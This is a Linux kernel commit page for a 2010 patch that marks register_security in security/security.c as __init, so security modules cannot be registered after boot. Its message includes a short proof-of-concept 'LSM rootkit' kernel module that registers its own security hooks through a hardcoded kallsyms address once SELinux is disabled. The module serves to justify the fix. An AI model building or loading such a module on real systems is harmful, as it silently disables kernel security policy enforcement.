diff options
author | wzt.wzt@gmail.com <wzt.wzt@gmail.com> | 2010-02-26 09:49:55 -0500 |
---|---|---|
committer | James Morris <jmorris@namei.org> | 2010-03-02 17:15:28 -0500 |
commit | c1e992b99603a84d7debb188542b64f2d9232c07 (patch) | |
tree | 786b1ec0c06c3d5a9df7bc3123c881ccae083d65 /security/security.c | |
parent | 3a5b27bf6f29574d667230c7e76e4b83fe3014e0 (diff) |
Security: Add __init to register_security to disable load a security module on runtime
LSM framework doesn't allow to load a security module on runtime, it must be loaded on boot time.
but in security/security.c:
int register_security(struct security_operations *ops)
{
...
if (security_ops != &default_security_ops)
return -EAGAIN;
...
}
if security_ops == &default_security_ops, it can access to register a security module. If selinux is enabled,
other security modules can't register, but if selinux is disabled on boot time, the security_ops was set to
default_security_ops, LSM allows other kernel modules to use register_security() to register a not trust
security module. For example:
disable selinux on boot time(selinux=0).
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/version.h>
#include <linux/string.h>
#include <linux/list.h>
#include <linux/security.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");
extern int register_security(struct security_operations *ops);
int (*new_register_security)(struct security_operations *ops);
int rootkit_bprm_check_security(struct linux_binprm *bprm)
{
return 0;
}
struct security_operations rootkit_ops = {
.bprm_check_security = rootkit_bprm_check_security,
};
static int rootkit_init(void)
{
printk("Load LSM rootkit module.\n");
/* cat /proc/kallsyms | grep register_security */
new_register_security = 0xc0756689;
if (new_register_security(&rootkit_ops)) {
printk("Can't register rootkit module.\n");
return 0;
}
printk("Register rootkit module ok.\n");
return 0;
}
static void rootkit_exit(void)
{
printk("Unload LSM rootkit module.\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);
Signed-off-by: Zhitong Wang <zhitong.wangzt@alibaba-inc.com>
Signed-off-by: James Morris <jmorris@namei.org>
Diffstat (limited to 'security/security.c')
-rw-r--r-- | security/security.c | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/security/security.c b/security/security.c index 122b748d0f4c..7da630a8c065 100644 --- a/security/security.c +++ b/security/security.c | |||
@@ -110,7 +110,7 @@ int __init security_module_enable(struct security_operations *ops) | |||
110 | * If there is already a security module registered with the kernel, | 110 | * If there is already a security module registered with the kernel, |
111 | * an error will be returned. Otherwise %0 is returned on success. | 111 | * an error will be returned. Otherwise %0 is returned on success. |
112 | */ | 112 | */ |
113 | int register_security(struct security_operations *ops) | 113 | int __init register_security(struct security_operations *ops) |
114 | { | 114 | { |
115 | if (verify(ops)) { | 115 | if (verify(ops)) { |
116 | printk(KERN_DEBUG "%s could not verify " | 116 | printk(KERN_DEBUG "%s could not verify " |